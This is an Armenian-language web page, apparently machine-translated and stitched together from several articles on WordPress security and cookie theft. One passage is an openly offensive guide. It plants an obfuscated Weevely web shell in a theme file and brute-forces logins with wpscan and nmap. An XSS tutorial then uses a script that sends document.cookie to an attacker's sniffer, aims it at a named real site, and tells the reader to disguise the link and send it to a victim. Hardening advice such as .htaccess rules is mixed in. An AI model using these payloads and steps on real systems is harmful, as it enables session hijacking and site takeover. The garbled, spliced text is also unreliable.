Ինչպես գողանալ թխուկներ. Թխուկներ գողանալու հեշտ միջոց

WordPress-ը հարմար բլոգային հարթակ է հոդվածներ հրապարակելու և կառավարելու համար, որի վրա հիմնված են հսկայական թվով տարբեր կայքեր։ Իր տարածվածության պատճառով այս CMS-ը վաղուց արդեն համեղ պատառ է դարձել հարձակվողների համար: Ցավոք սրտի, հիմնական կարգավորումները չեն ապահովում պաշտպանության բավարար մակարդակ՝ թողնելով բազմաթիվ լռելյայն անցքեր չփակված: Այս հոդվածում մենք կանցնենք WordPress կայքի «տիպիկ» կոտրման տիպիկ ճանապարհով, ինչպես նաև ցույց կտանք, թե ինչպես վերացնել հայտնաբերված խոցելիությունները:

Այսօր WordPress-ը բովանդակության կառավարման ամենահայտնի համակարգն է: Նրա մասնաբաժինը կազմում է CMS շարժիչներ օգտագործող կայքերի ընդհանուր թվի 60,4%-ը։ Դրանցից, ըստ վիճակագրության, կայքերի 67.3%-ը հիմնված է վերջին տարբերակըտրված ծրագրային ապահովում. Միևնույն ժամանակ, վեբ շարժիչի գոյության տասներկու տարիների ընթացքում նրանում հայտնաբերվել են տարբեր տեսակի 242 խոցելիություններ (բացառությամբ երրորդ կողմի պլագինների և թեմաների հայտնաբերված խոցելիությունների): Իսկ երրորդ կողմի հավելումների վիճակագրությունն էլ ավելի տխուր է թվում: Այսպիսով, Revisium ընկերությունը վերլուծել է 2350 ռուսացված WordPress կաղապարներ՝ վերցված տարբեր աղբյուրներից։ Արդյունքում, նրանք պարզել են, որ կեսից ավելին (54%) վարակված է վեբ կեղևներով, հետին դռներով, blackhat SEO («սպամ») հղումներով, ինչպես նաև պարունակում է կրիտիկական խոցելիություններ ունեցող սցենարներ: Այսպիսով, ձեզ հարմարավետ դարձրեք, հիմա մենք կպարզենք, թե ինչպես ստուգել WordPress կայքը և վերացնել հայտնաբերված թերությունները: Մենք կօգտագործենք 4.1 տարբերակը (ռուսացված):

Ցանկացած թեստի առաջին քայլը սովորաբար թիրախի մասին տեղեկություններ հավաքելն է: Եվ հենց այստեղ է դա հաճախ օգնում: սխալ կարգավորումկայքի ինդեքսավորում, որը թույլ է տալիս չարտոնված օգտվողներին դիտել կայքի առանձին բաժինների բովանդակությունը և, օրինակ, տեղեկատվություն ստանալ տեղադրված պլագիններև թեմաներ, ինչպես նաև մուտք դեպի գաղտնի տվյալներ կամ կրկնօրինակներտվյալների բազաներ։ Ստուգելու համար, թե որ գրացուցակները տեսանելի են դրսից, ամենահեշտ ճանապարհը Google-ից օգտվելն է: Բավական է լրացնել Google հարցում Dorks-ը սիրում է site:example.com intitle:"index of" inurl:/wp-content/: Հետևյալ դիրեկտորիաները կարող են նշվել inurl-ում. հայտարարություն.

/wp-content/ /wp-content/languages/plugins /wp-content/languages/themes /wp-content/plugins/ /wp-content/themes/ /wp-content/uploads/

Եթե ​​կարող եք նայել /wp-content/plugins/-ին, ապա տեղադրված փլագինների և դրանց տարբերակների մասին տեղեկություններ հավաքելու հաջորդ քայլը շատ ավելի հեշտ է: Բնականաբար, դուք կարող եք անջատել ինդեքսավորումը՝ օգտագործելով robots.txt ֆայլը: Քանի որ լռելյայնորեն այն ներառված չէ WordPress-ի տեղադրման փաթեթում, դուք պետք է ինքներդ ստեղծեք այն և տեղադրեք կայքի արմատային գրացուցակում։ «Robots.txt» ֆայլը ստեղծելու և աշխատելու վերաբերյալ բավականին շատ ձեռնարկներ կան, ուստի այս թեման կթողնեմ ինքնապատրաստման համար: Ես կտամ հնարավոր տարբերակներից միայն մեկը.

Օգտվողի գործակալ. * Արգելել. /cgi-bin Արգելել. /wp-login.php Արգելել. /wp-admin/ Արգելել. : /wp-content/themes/ Արգելել՝ /?author=* Թույլատրել՝ /

Եթե ​​վերբեռնումների թղթապանակում պահվող ֆայլերը պարունակում են գաղտնի տեղեկատվություն, ավելացրեք տողը այս ցանկում՝ Թույլ չտալ՝ /wp-content/uploads/:
Մյուս կողմից, խորհուրդ չի տրվում robots.txt ֆայլում տեղադրել դիրեկտորիաների հղումներ, որոնք ստեղծվել են հատուկ զգայուն տեղեկատվության պահպանման համար: Հակառակ դեպքում, դրանով դուք կհեշտացնեք հարձակվողի խնդիրը, քանի որ սա առաջին տեղն է, որտեղ բոլորը սովորաբար փնտրում են ինչ-որ «հետաքրքիր» բան:

Մեկ այլ կարևոր քայլ նույնականացումն է CMS տարբերակները. Հակառակ դեպքում, ինչպե՞ս ընտրել հարմար շահագործում: Կան երեք արագ ուղիներկայքում օգտագործվող WordPress-ի տարբերակը որոշելու համար.

Պաշտպանության տարբերակներից մեկը այս դեպքում- սահմանափակել մուտքը readme.html և ru_RU.po ֆայլեր՝ օգտագործելով .htaccess:

WordPress-ի անվտանգության հետազոտությունը երեկ չի սկսվել, ուստի կան բավարար թվով գործիքներ, որոնք թույլ են տալիս ավտոմատացնել սովորական առաջադրանքները:

• տարբերակի և թեմայի հայտնաբերում, օգտագործելով սկրիպտը http-wordpress-info nmap -sV --script http-wordpress-info
• գաղտնաբառ գուշակելով բառարանների միջոցով nmap -p80 --script http-wordpress-brute --script-args "userdb=users.txt,passdb=passwords.txt" example.com

• տարբերակի որոշման մոդուլ՝ օժանդակ/սկաներ/http/wordpress_scanner ;
• մոդուլ՝ օժանդակ/սկաներ/http/wordpress_login_enum օգտանունը որոշելու համար:

• տեղադրվող պլագինների ցուցակագրում՝ wpscan --url www.exmple.com --enumerate p ;
• տեղադրվող թեմաների ցուցակագրում՝ wpscan --url www.exmple.com --enumerate t ;
• թվարկել տեղադրված ժամանակացույցերը. wpscan --url www.example.com --enumerate tt ;
• որոշելով օգտվողի անունը՝ wpscan --url www.example.com --enumerate u ;
• ադմինիստրատորի օգտատիրոջ համար բառարանի միջոցով գաղտնաբառ ընտրելը. wpscan --url www.example.com --wordlist wordlist.txt --օգտանուն admin ;
• գաղտնաբառի գուշակում, օգտագործելով օգտվողի անուն/գաղտնաբառ համակցությունը 50-ի հավասար շղթաների քանակով. wpscan --url www.example.com --wordlist wordlist.txt --թելեր 50 .

Հիմա եկեք տեղեկություններ հավաքենք տեղադրված փլագինների և թեմաների մասին, անկախ նրանից՝ դրանք ակտիվացված են, թե ոչ։ Առաջին հերթին, նման տեղեկատվությունը կարելի է քաղել HTML էջի սկզբնաղբյուրից, օրինակ՝ JavaScript հղումներից, մեկնաբանություններից և CSS տիպի ռեսուրսներից, որոնք բեռնված են էջում: Սա տեղադրված բաղադրիչների մասին տեղեկատվություն ստանալու ամենադյուրին ճանապարհն է: Օրինակ, ստորև բերված տողերը ցույց են տալիս օգտագործվող քսանմեկ թեման.

Քանի որ հավելումների մասին տեղեկությունները միշտ չէ, որ ցուցադրվում են HTML էջի սկզբնաղբյուրում, դուք կարող եք հայտնաբերել տեղադրված բաղադրիչները՝ օգտագործելով WPScan կոմունալ ծրագիրը (տես կողագոտին): Պարզապես մի մոռացեք, որ plugin ուղիներով որոնումը կգրանցվի վեբ սերվերի տեղեկամատյաններում:
Տեղադրված բաղադրիչների մասին տվյալներ ստանալով՝ դուք կարող եք սկսել ինքնուրույն որոնել խոցելիությունը կամ գտնել հանրությանը հասանելի շահագործումներ այնպիսի ռեսուրսների վրա, ինչպիսիք են rapid7 կամ exploit-db:

Լռելյայնորեն, WordPress-ը յուրաքանչյուր օգտվողին հատկացնում է եզակի ID, որը ներկայացված է որպես թիվ՝ example.com/?author=1 : Թվերը դասավորելով՝ դուք կորոշեք կայքի օգտատերերի անունները։ Հաշիվադմինիստրատոր ադմին, որը ստեղծվում է գործընթացի ընթացքում WordPress-ի տեղադրումներ, գտնվում է թիվ 1-ում, ուստի խորհուրդ է տրվում հեռացնել այն որպես պաշտպանիչ միջոց։

Իմանալով օգտվողի անունը՝ կարող եք փորձել գուշակել կառավարման վահանակի գաղտնաբառը: WordPress-ի մուտքի ձևը wp-login.php էջում շատ տեղեկատվական է (նկ. 3), հատկապես հարձակվողի համար. եթե սխալ տվյալներ եք մուտքագրում, որոշակի օգտվողի համար սխալ օգտանունի կամ գաղտնաբառի մասին հուշումներ են հայտնվում: Մշակողները տեղյակ են այս հատկության մասին, սակայն որոշել են թողնել այն, քանի որ նման հաղորդագրությունները հարմար են այն օգտատերերի համար, ովքեր գուցե մոռացել են իրենց մուտքը և/կամ գաղտնաբառը: Գաղտնաբառի գուշակության խնդիրը կարող է լուծվել՝ օգտագործելով ուժեղ գաղտնաբառ, որը բաղկացած է տասներկու կամ ավելի նիշից և ներառում է մեծատառ և փոքրատառ, թվեր և հատուկ նիշեր: Կամ, օրինակ, օգտագործելով Login LockDown հավելվածը:

Գաղտնաբառը վերականգնելուց հետո մեզ ոչինչ չի խանգարում վտանգված վեբ ռեսուրս ներբեռնել կեղևը: Այս նպատակների համար Weevely-ի շրջանակը բավականին հարմար է, որը թույլ է տալիս ստեղծել կեղև մշուշված ձևով, ինչը բավականին դժվարացնում է դրա հայտնաբերումը: Կասկածներ չառաջացնելու համար ստացված կոդը կարող է տեղադրվել ցանկացած թեմայի ֆայլի մեջ (օրինակ՝ index.php) WordPress կոնսոլի թեմաների խմբագրիչի միջոցով։ Այնուհետև, օգտագործելով նույն Weevely-ն, կարող եք միանալ զոհի մեքենային և զանգահարել տարբեր հրամաններ.

Python weevely.py http://test/index.php Pa$$w0rd [+] weevely 3.1.0 [+] Target:test [+] Աշխատաշրջան՝ _weevely/sessions/test/index_0.session [+] Թերթիր ֆայլային համակարգը կամ կատարել հրամանները սկսում է [+] կապը թիրախին: Տեսակ: օգնություն լրացուցիչ տեղեկությունների համար: weevely>:օգնություն

Զգայուն տեղեկատվության հասանելիությունը մերժելու համար ավելի լավ է օգտագործել .htaccess ֆայլը. սա Apache Web Server-ում օգտագործվող կազմաձևման ֆայլ է: Դիտարկենք այս ֆայլի հնարավորությունները անվտանգության տեսանկյունից։ Նրա օգնությամբ դուք կարող եք՝ մերժել մուտքը գրացուցակներ և ֆայլեր, արգելափակել տարբեր SQL ներարկումներ և վնասակար սկրիպտներ: Այդ նպատակով ստանդարտ .htaccess ֆայլը CMS WordPress 4.1-ը պետք է մի փոքր ընդլայնել: Ֆայլերի և թղթապանակների ցանկը փակելու համար ավելացրեք.

Ընտրանքներ +FollowSymLinks -Ինդեքսներ

RewriteCond %(QUERY_STRING) base64_encode[^(]*\([^)]*\)-ը կարգելափակի Base64 կոդավորում պարունակող հղումները: Ազատվել պիտակ պարունակող հղումներից.

RewriteCond %(QUERY_STRING) (|%3E)

Հակառակ սկրիպտներ, որոնք փորձում են սահմանել գլոբալ փոփոխականներ կամ փոխել _REQUEST փոփոխականը URL-ի միջոցով.

RewriteCond %(QUERY_STRING) GLOBALS (=|\[|\%(0,2)) RewriteCond %(QUERY_STRING) _REQUEST (=|\[|\%(0,2))

SQL ներարկումներին հակազդելու համար մենք արգելափակում ենք որոշակի հիմնաբառեր պարունակող URL-ների հարցումները.

RewriteCond %(query_string) concat.*\( RewriteCond %(query_string) union.*select.*\(RewriteCond %(query_string) union.*all.*ընտրել RewriteRule ^(.*)$ index.php

Ընդհանուր հաքերային կոմունալ ծառայությունների կյանքը փչացնելու համար մենք զտում ենք որոշ օգտվողների գործակալներ.

SetEnvIf user-agent «Indy Library» stayout=1 SetEnvIf user-agent «libwww-perl» stayout=1 SetEnvIf user-agent «Wget» stayout=1 հերքել env=stayout-ից

Լավ կլինի նաև սահմանափակել մուտքը հատկապես կարևոր ֆայլեր, որոնք պահում են կոնֆիգուրացիան կամ պարզապես կարող են որոշ տեղեկություններ տրամադրել հարձակվողին: Կարելի է առանձնացնել հետևյալ թեկնածուներին.

• wp-config.php , պարունակում է տվյալների բազայի անունը, օգտվողի անունը, գաղտնաբառը և աղյուսակի նախածանցը;
• .htaccess ;
• readme.html և ru_RU.po, որոնք պարունակում են WordPress տարբերակը;
• install.php .

Դա արվում է հետևյալ կերպ.

Պատվիրել Թույլատրել, Մերժել Մերժել բոլորից

Ավելին, այս տողերը պարունակող .htaccess ֆայլը պետք է գտնվի նույն գրացուցակում, ինչ պաշտպանված ֆայլը: Այնուհետև մենք արգելում ենք օգտատերերի ցուցակագրումը (հիշեք, հենց վերևում մենք խոսեցինք այն մասին, թե որքան հեշտ է օգտատերերի ցուցակ ստանալը):

RewriteCond %(QUERY_STRING) հեղինակ=\d RewriteRule ^ /?

Ուրեմն, էլ ի՞նչ։ Դուք կարող եք մուտք գործել միայն նշված IP հասցեներից: Դա անելու համար wp-admin թղթապանակում ստեղծեք .htaccess ֆայլ հետևյալ կանոններով.

AuthUserFile /dev/null AuthGroupFile /dev/null AuthName «Access Control» AuthType Հիմնական կարգի մերժում, թույլատրել մերժել բոլոր թույլտվություններից սկսած 178.178.178.178 # Տնային համակարգչի IP թույլտվություն 248.248.248.248-ից # Աշխատանքային համակարգիչ

Մեթոդը այնքան էլ ճկուն չէ և կիրառելի է միայն այն դեպքում, եթե դուք աշխատում եք սահմանափակ թվով ֆիքսված IP հասցեների հետ: IN հակառակ դեպքումԽորհուրդ է տրվում գաղտնաբառ տեղադրել wp-admin թղթապանակի համար հոսթինգի վահանակի միջոցով (եթե այդպիսի ֆունկցիոնալությունը հասանելի է):

Վերևում ասվածին կարելի է ավելացնել հետևյալ առաջարկությունները. Նախ, օգտագործեք միայն ընթացիկ տարբերակները WordPress-ը և դրա բաղադրիչները՝ սա կվերացնի հայտնի խոցելիությունը: Երկրորդ, հեռացրեք չօգտագործված պլագիններն ու թեմաները, որոնք նույնպես կարող են շահագործվել: Երրորդ, ներբեռնեք թեմաներ և WordPress հավելվածներվստահելի աղբյուրներից, ինչպիսիք են մշակողների կայքերը և WordPress-ի պաշտոնական կայքը: Ինչպես ձեր տան համակարգիչը, դուք պետք է պարբերաբար ստուգեք ձեր վեբ ռեսուրսը վեբ հակավիրուսով, օրինակ՝ AI-Bolit-ով: Եթե ​​դուք մուտք ունեք վեբ սերվեր, կազմաձևեք ֆայլերի և գրացուցակների մուտքի իրավունքները: Որպես կանոն, WordPress-ը տեղադրման փուլում սահմանում է բոլոր անհրաժեշտ իրավունքները, սակայն անհրաժեշտության դեպքում chmod-ը կարող է կարգավորվել ձեռքով։ Գրացուցակների համար՝ chmod 755, ֆայլերի համար՝ chmod 644։ Համոզվեք, որ 777 իրավունքներ հատկացվում են միայն այն օբյեկտներին, որոնք դրա կարիքն ունեն (երբեմն դա անհրաժեշտ է. նորմալ շահագործումորոշ պլագիններ): Եթե ​​WordPress-ը դադարում է նորմալ գործել, փորձարկեք մուտքի իրավունքները. նախ փորձեք 755, ապա 766 և վերջապես 777: Բոլոր htaccess ֆայլերի համար սահմանեք chmod 444 (միայն կարդալու համար): Եթե ​​կայքը դադարում է աշխատել, փորձեք փորձարկել 400, 440, 444, 600, 640, 644 արժեքները:

Տեղափոխեք wp-config.php ֆայլը: Այս ֆայլըպարունակում է տեղեկատվություն MySQL կարգավորումների, աղյուսակի նախածանցի, գաղտնի բանալիների և այլնի մասին: Հետեւաբար, այն պետք է փոխանցվի այնպես, որ ֆայլը հասանելի չլինի ինտերնետից: Եթե ​​կայքը տեղակայված չէ public_html թղթապանակում, ապա wp-config.php ֆայլը տեղափոխեք ավելի բարձր թղթապանակ, և WordPress-ը ավտոմատ կերպով կգտնի այն այս արմատային գրացուցակում (կիրառելի է, եթե հոսթինգն ունի միայն մեկ կայք այս CMS-ում):

Կեղևը լրացնելն ավելի դժվարացնելու համար անջատեք թեման WordPress վահանակի միջոցով խմբագրելու հնարավորությունը: Դա անելու համար wp-config.php ֆայլում տեղադրեք հետևյալ տողը. define("DISALLOW_FILE_EDIT", true); .

Մեկ այլ թույլ կետ է install.php ֆայլը (որը գտնվում է wp-admin թղթապանակում): Հետեւաբար, ավելի լավ է ջնջել, արգելափակել կամ փոխել այն: Կատարեք տարբերակներից մեկը.

Բացի կայքի այցելուներին ծանուցելուց, այս սկրիպտը կատարում է հետևյալ գործողությունները.

• ուղարկում է 503 կարգավիճակի կոդը հաճախորդին և որոնման համակարգերին («Ծառայությունը ժամանակավորապես անհասանելի է»);
• ցույց է տալիս այն ժամանակահատվածը, որից հետո հաճախորդները և որոնման համակարգերկարող է վերադառնալ կայք (կարգավորելի պարամետր);
• տեղեկացնում է էլտվյալների բազայի խնդրի մասին, որպեսզի համապատասխան միջոցներ ձեռնարկվեն։

Փաստն այն է, որ WordPress-ի ավելի վաղ տարբերակներում (alert() և սեղմեք «գտնել»
Հայտնվում է xss-ով պատուհան, ինչը նշանակում է, որ xss-ն առկա է (Հնարավոր է, երբ դուք կարդաք այս հոդվածը, այս xss-ն արդեն հեռացված կլինի):

2.2.Ակտիվ XSS
Նման css-ը կարող է լինել, օրինակ, պրոֆիլի դաշտերում, նորությունների վերնագրում և բուն նորությունների մեջ նորություններ ավելացնելիս (ավելի քիչ հաճախ), ֆորումների/չաթերի/հյուրերի սենյակների հաղորդագրություններում, որոնց html միացված է: Այստեղ ամեն ինչ պարզ է, մենք նախորդ ենթապարբերության սցենարը մուտքագրում ենք դաշտերի մեջ, և եթե հաղորդագրությունը ցուցադրվում է էկրանին, ապա խոցելիությունը առկա է:
Եկեք նայենք xss-ին BB թեգերում ֆորումներում:
Դուք կարող եք փորձել պարզապես տեղադրել javascript կոդը պիտակի մեջ, օրինակ այսպես.
javascript:alert ('xss')
Որոշ թեգեր ունեն պարամետրեր, օրինակ թեգը ունի dynsrc և lowsrc պարամետրեր, եկեք փորձենք փոխարինել կոդը այսպես.
http://www.site.ru/image.jpg dynsrc=javascript:alert(‘xss’)
Եթե ​​սցենարը աշխատել է, ապա xss-ը կա

3. XSS-ի օգտագործումը թխուկներ գողանալու համար
Հիմա ամենահամեղը))))
Թխուկներ գողանալու համար մեզ անհրաժեշտ է վեբ սնիֆեր, դուք կարող եք տեղադրել ձեր հոսթինգի վրա ինչ-որ sniffer, կամ կարող եք օգտագործել առցանց sniffer, որն այժմ շատ է:
Պասիվ XSS-ի միջոցով թխուկներ գողանալու համար տուժողը պետք է հետևի թունավոր հղմանը: Թխուկներ գողանալու համար մենք կօգտագործենք մեկ այլ սկրիպտ՝ alert('xss') փոխարեն.
img = նոր պատկեր ();


մենք սկրիպտը փոխարինում ենք հղման մեջ և թույլ ենք տալիս, որ զոհը հետևի դրան, նայիր sniffer log-ին և ուրախանա:
Դիտարկենք մի օրինակ։
Վերցնենք այդ XSS-ը Rambler-ում նախորդ պարբերությունից:
Մենք տեղադրում ենք
">
img = նոր պատկեր ();
img.src = "sniffer պատկերի հասցե"+document.cookie;

որոնման ձևում սեղմեք «գտնել», նայեք հասցեի տողին և տեսեք.

http://miss.rambler.ru/srch/?sort=0& … &words =">
Մենք ուղարկում ենք այս հղումը տուժածին և վայելում թխուկները:
Նման հղում տեսնելով՝ տուժողը կարող է ինչ-որ բան կասկածել, ուստի նպատակահարմար է կոդավորել
">img = new Image();img.src = "sniffer image address"+document.cookie;
URL-ում Կամ օգտագործեք այնպիսի ծառայություններ, ինչպիսիք են http://tinyurl.com/
Անցնենք ակտիվ XSS-ին, այստեղ ամեն ինչ պարզ է, alert()-ի փոխարեն տեղադրում ենք img = new Image();img.src = "sniffer image-ի հասցեն"+document.cookie;

Այժմ մենք ունենք թխուկներ: Բայց ի՞նչ անել նրանց հետ: Դա պարզ է, դուք պետք է դրանք փոխարինեք ձեր սեփականի փոխարեն: IN Opera բրաուզերկա ներկառուցված թխուկների խմբագիր (գործիքներ-> առաջադեմ->թխուկների կառավարում), կա plugin firefox-ի համար (չեմ հիշում, թե ինչ է կոչվում, օգտագործիր Google-ը)
Առայժմ այսքանը, միգուցե հոդվածը կլրացվի

Նկարում երևում է, որ թխուկը պարունակում է wordpress_logged_in_263d663a02379b7624b1028a58464038=admin տողը: Այս արժեքը չգաղտնագրված ձևով է թխուկի մեջ և կարելի է հեշտությամբ գաղտնալսել՝ օգտագործելով «Աքիլես» կոմունալ ծրագիրը, սակայն շատ դեպքերում «Աքիլես»-ում դուք կարող եք տեսնել միայն որոշակի մուտքի հեշը: Հարցումը սերվեր ուղարկելուց առաջ կարող եք փորձել փոխարինել այս տողը ցանկացած նմանատիպով (չնայած այս դեպքում ոչ մի կետ չկա)՝ փորձերի քանակը սահմանափակ չէ։ Այնուհետև ուղարկելով այս հարցումը սերվերին՝ ուղարկելով «Ուղարկել» կոճակը, կարող եք պատասխան ստանալ ադմինիստրատորի համար նախատեսված սերվերից։

Նախորդ օրինակում կարող եք օգտագործել ուղղակի օգտագործողի ID-ի կեղծում: Բացի այդ, պարամետրի անվանումը, որի արժեքը փոխարինելով ապահովում է լրացուցիչ հնարավորություններհաքեր, կարող է լինել հետևյալը՝ օգտվող (օրինակ՝ USER=JDOE), ID տողով ցանկացած արտահայտություն (օրինակ՝ USER=JDOE կամ SESSIONID=BLAHBLAH), ադմինիստրատոր (օրինակ՝ ADMIN=TRUE), նիստ (օրինակ՝ , SESSION=ACTIVE), cart (օրինակ՝ CART=FULL), ինչպես նաև այնպիսի արտահայտություններ, ինչպիսիք են TRUE, FALSE, ACTIVE, INACTIVE: Սովորաբար, թխուկների ձևաչափը շատ կախված է այն հավելվածից, որի համար դրանք օգտագործվում են: Այնուամենայնիվ, թխուկների միջոցով հավելվածի թերությունները գտնելու այս խորհուրդները վերաբերում են գրեթե բոլոր ձևաչափերին:

IN ընդհանուր դեպքՕգտագործողները պետք է զգուշանան վեբ կայքերից, որոնք օգտագործում են թխուկներ նույնականացման և զգայուն տվյալներ պահելու համար: Կարևոր է նաև հիշել, որ նույնականացման համար թխուկներ օգտագործող վեբ կայքը պետք է առնվազն աջակցի SSL արձանագրությունօգտագործողի անունը և գաղտնաբառը ծածկագրելու համար, քանի որ այս արձանագրության բացակայության դեպքում տվյալները փոխանցվում են չգաղտնագրված ձևով, ինչը թույլ է տալիս դրանք գաղտնալսել՝ օգտագործելով ամենապարզը ծրագրային ապահովումցանցով ուղարկվող տվյալները դիտելու համար:

Kookaburra Software-ը մշակել է գործիք՝ հեշտացնելու թխուկների օգտագործումը: Գործիքը կոչվում է CookiePal (http://www.kburra.com/cpal.html (տես www.kburra.com)): Այս ծրագիրընախագծված է օգտատիրոջը զգուշացնելու, երբ վեբ կայքը փորձում է թխուկ տեղադրել սարքի վրա, և օգտատերը կարող է թույլատրել կամ մերժել այս գործողությունը: Նմանատիպ հատկանիշներԹխուկների արգելափակումն այսօր հասանելի է բոլոր բրաուզերներում:

Վեբ բրաուզերի թարմացումների կանոնավոր տեղադրման մեկ այլ պատճառ էլ այն է, որ այս ծրագրերի անվտանգության թերությունները մշտապես հայտնաբերվում են: Այսպիսով, Բեննեթ Հեյզելթոնը և Ջեյմի Մաքքարթին ստեղծել են մի սցենար, որը հղման վրա սեղմելուց հետո քուքիները առբերում է հաճախորդի մեքենայից: Արդյունքում, թխուկների ամբողջ բովանդակությունը, որը գտնվում է օգտատիրոջ մեքենայի վրա, հասանելի է դառնում:

Այս տեսակի կոտրումը կարող է իրականացվել նաև վեբ էջի HTML տեքստում (կամ HTML բովանդակության մեջ ներառված բռնակի միջոցով) էլկամ լրատվական խմբեր) թխուկներ գողանալու համար: Դիտարկենք հետևյալ օրինակը.

Ապահովելու համար, որ նման բաները չեն սպառնում մեր անձնական տվյալներին, ես դա անում եմ ինքս և խորհուրդ եմ տալիս բոլորին միշտ թարմացնել HTML կոդով աշխատող ծրագրակազմը (էլ. փոստի հաճախորդներ, մեդիա նվագարկիչներ, բրաուզերներ և այլն):

Շատերը նախընտրում են պարզապես արգելափակել թխուկները, սակայն վեբ կայքերից շատերը պահանջում են թխուկներ զննել: Եզրակացություն. եթե մոտ ապագայում հայտնվի նորարարական տեխնոլոգիա, որը թույլ է տալիս անել առանց թխուկների, ծրագրավորողները և ադմինիստրատորները հանգիստ շունչ կքաշեն, բայց առայժմ թխուկները հաքերի համար մնում են համեղ պատառ: Սա ճիշտ է, քանի որ ավելի լավ այլընտրանք դեռ չկա։

Երբ խոսքը վերաբերում է սերվերի անվտանգության ապահովման առաջարկություններին, փորձագետները տալիս են մեկ պարզ խորհուրդ՝ մի օգտագործեք թխուկների մեխանիզմը, եթե խիստ անհրաժեշտ չէ: Առանձնահատուկ զգուշություն պետք է ցուցաբերվի, երբ օգտագործում եք թխուկներ, որոնք մնում են օգտատիրոջ համակարգում հաղորդակցության նիստի ավարտից հետո:

Իհարկե, կարևոր է հասկանալ, որ թխուկները կարող են օգտագործվել վեբ սերվերների անվտանգությունն ապահովելու համար՝ օգտատերերի նույնականացման համար: Եթե ​​ձեր հավելվածը պետք է օգտագործի թխուկներ, դուք պետք է կարգավորեք թխուկների մեխանիզմը այնպես, որ օգտագործի տարբեր ստեղներ՝ վավերականության կարճ ժամկետով յուրաքանչյուր նստաշրջանի համար, և փորձեք չտեղադրել տեղեկատվություն այս ֆայլերում, որոնք կարող են օգտագործվել հաքերների կողմից հաքերների համար (օրինակ՝ ADMIN=): ՃԻՇՏ):

Բացի այդ, ավելի մեծ անվտանգություն ապահովելու հետ աշխատելիս թխվածքաբլիթներարդյունահանումը կանխելու համար կարող եք օգտագործել կոդավորումը կարևոր տեղեկություն. Իհարկե, գաղտնագրումը չի լուծում բոլոր անվտանգության խնդիրները cookie տեխնոլոգիայի հետ աշխատելիս, սակայն այս մեթոդը կկանխի վերը նկարագրված ամենահիմնական հաքերները:

Թխվածքաբլիթներ- տեղեկատվություն ձևի մեջ տեքստային ֆայլ, որը պահվում է օգտատիրոջ համակարգչում կայքի կողմից: Պարունակում է նույնականացման տվյալներ (մուտք/գաղտնաբառ, ID, հեռախոսահամար, հասցե փոստարկղ), օգտվողի կարգավորումներ, մուտքի կարգավիճակ: Պահպանվում է բրաուզերի պրոֆիլում:

Թխուկների կոտրումվեբ ռեսուրսի այցելուների նիստի գողությունն է (կամ «առևանգումը»): Անձնական տեղեկատվությունը հասանելի է դառնում ոչ միայն ուղարկողին և ստացողին, այլ նաև երրորդ կողմին՝ գաղտնալսումն իրականացրած անձին:

Համակարգչային գողերը, ինչպես իրական կյանքում իրենց գործընկերները, բացի հմտություններից, ճարտարությունից և գիտելիքներից, իհարկե, ունեն նաև իրենց գործիքները՝ վարպետ բանալիների և զոնդերի մի տեսակ զինանոց: Դիտարկենք ամենահայտնի հնարքները, որոնք օգտագործում են հաքերները՝ համացանցի օգտատերերից թխուկներ հանելու համար:

Հատուկ ծրագրերհետևելու և վերլուծելու համար ցանցային տրաֆիկ. Նրանց անունը գալիս է անգլերեն «sniff» (sniff) բայից, քանի որ. բառացիորեն «շնչել» փոխանցված փաթեթները հանգույցների միջև:

Բայց հարձակվողները օգտագործում են sniffer՝ սեսիայի տվյալները, հաղորդագրությունները և այլ բաներ որսալու համար գաղտնի տեղեկատվություն. Նրանց հարձակումների թիրախը հիմնականում անպաշտպան ցանցերն են, որտեղ քուքիները ուղարկվում են բաց HTTP նիստում, այսինքն՝ գործնականում գաղտնագրված չեն։ (Հանրային Wi-Fi-ն այս առումով ամենախոցելին է):

Օգտվողի հանգույցի և վեբ սերվերի միջև ինտերնետ կապուղու մեջ ներդնելու համար օգտագործվում են հետևյալ մեթոդները.

• ցանցային ինտերֆեյսների «լսում» (հանգույցներ, անջատիչներ);
• տրաֆիկի ճյուղավորում և պատճենում;
• միացում ցանցային ալիքի բացին;
• վերլուծություն հատուկ հարձակումների միջոցով, որոնք վերահղում են տուժողի թրաֆիկը դեպի sniffer (MAC-spoofing, IP-spoofing):

XSS հապավումը նշանակում է Cross Site Scripting: Օգտագործվում է կայքերի վրա հարձակվելու համար՝ օգտատերերի տվյալները գողանալու նպատակով:

XSS-ի սկզբունքը հետևյալն է.

• հարձակվողը տեղադրում է վնասակար կոդ (հատուկ քողարկված սկրիպտ) վեբկայքի, ֆորումի կամ հաղորդագրության մեջ (օրինակ՝ սոցիալական ցանցում նամակագրության ժամանակ);
• տուժողը գնում է վարակված էջ և ակտիվացնում է տեղադրված կոդը իր ԱՀ-ում (սեղմում է, հետևում է հղմանը և այլն);
• իր հերթին, կատարված վնասակար կոդը «հանում» է օգտատիրոջ գաղտնի տվյալները բրաուզերից (մասնավորապես՝ թխուկները) և ուղարկում այն ​​հարձակվողի վեբ սերվերին։

Ծրագրային XSS մեխանիզմ «ներդրելու» համար հաքերներն օգտագործում են վեբ սերվերների, առցանց ծառայությունների և բրաուզերների բոլոր տեսակի խոցելիությունները:

Բոլոր XSS խոցելիությունները բաժանված են երկու տեսակի.

• Պասիվ.Հարձակումը ձեռք է բերվում վեբ էջի վրա կոնկրետ սկրիպտ պահանջելու միջոցով: Վնասակար կոդկարող է մուտքագրվել վեբ էջի տարբեր ձևերով (օրինակ, կայքի որոնման տողում): Պասիվ XSS-ին առավել ենթակա են ռեսուրսները, որոնք չեն զտում HTML պիտակները, երբ տվյալները հասնում են.
• Ակտիվ.Գտնվում է անմիջապես սերվերի վրա: Եվ դրանք ակտիվացված են զոհի բրաուզերում: Դրանք ակտիվորեն օգտագործվում են խաբեբաների կողմից բոլոր տեսակի բլոգներում, չաթերում և նորությունների հոսքերում:

Հաքերները զգուշորեն «քողարկում» են իրենց XSS սկրիպտները, որպեսզի զոհը որևէ բան չկասկածի։ Նրանք փոխում են ֆայլի ընդլայնումը, ծածկագիրը փոխանցում են որպես պատկեր, դրդում են նրանց հետևել հղմանը և գրավել նրանց հետաքրքիր բովանդակությամբ։ Արդյունքում՝ համակարգչի օգտատերը, չկարողանալով վերահսկել իր հետաքրքրասիրությունը, իր ձեռքով (մկնիկի սեղմումով) ուղարկում է նիստի թխուկներ (մուտքի և գաղտնաբառով!) XSS սցենարի հեղինակին՝ համակարգչի չարագործին:

